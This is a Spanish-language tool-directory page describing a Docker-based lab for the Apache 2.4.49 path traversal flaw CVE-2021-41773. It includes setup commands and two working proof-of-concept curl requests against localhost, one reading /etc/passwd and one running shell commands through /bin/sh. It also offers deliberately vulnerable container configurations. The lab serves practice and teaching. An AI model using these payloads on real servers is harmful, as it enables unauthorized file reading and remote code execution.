Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-41773S — Laboratorio vulnerable basado en Docker para CVE-2021-41773 Apache path traversal, que proporciona configuraciones de PoC para lectura de archivos y ejecución remota de código en un entorno controlado. | Kitploit
Herramientas/GitHubGitHub/mightysai1997/cve-2021-41773s
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubmightysai1997/cve-2021-41773s

CVE-2021-41773S

Laboratorio vulnerable basado en Docker para CVE-2021-41773 Apache path traversal, que proporciona configuraciones de PoC para lectura de archivos y ejecución remota de código en un entorno controlado.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
19hace 4 añosAún no revisado

Imágenes vulnerables de Docker para la vulnerabilidad de Apache de path traversal CVE-2021-41773

Esta vulnerabilidad solo aplica a la versión 2.4.49 que tiene configuraciones no predeterminadas específicas. En ciertas situaciones, esto puede resultar en lectura de archivos o ejecución de código.

tuit https://twitter.com/ptswarm/status/1445376079548624899

Configuración vulnerable de lectura de archivos

Los contenedores se pueden obtener directamente de Docker Hub usando

docker pull blueteamsteve/cve-2021-41773:no-cgid

y ejecutar usando

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

Los registros de Apache se pueden ver usando lo siguiente, o simplemente excluyendo "-dit" del comando run anterior para transmitir stdio docker logs <container-id>

PoC para lectura de archivos

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Configuración vulnerable de RCE

Los contenedores se pueden obtener directamente de Docker Hub usando

docker pull blueteamsteve/cve-2021-41773:with-cgid

y ejecutar usando

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

Los registros de Apache se pueden ver usando lo siguiente, o simplemente excluyendo "-dit" del comando run anterior para transmitir stdio docker logs <container-id>

PoC para RCE

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

Construir contenedores Docker personalizados

Modifique y construya sus propias versiones usando el archivo dockerfile y las plantillas httpd.conf en los subdirectorios

  • Use ./no-cgi para la configuración vulnerable a la lectura de archivos
  • Use ./with-cgi para la configuración vulnerable a la ejecución de código
Descargar herramienta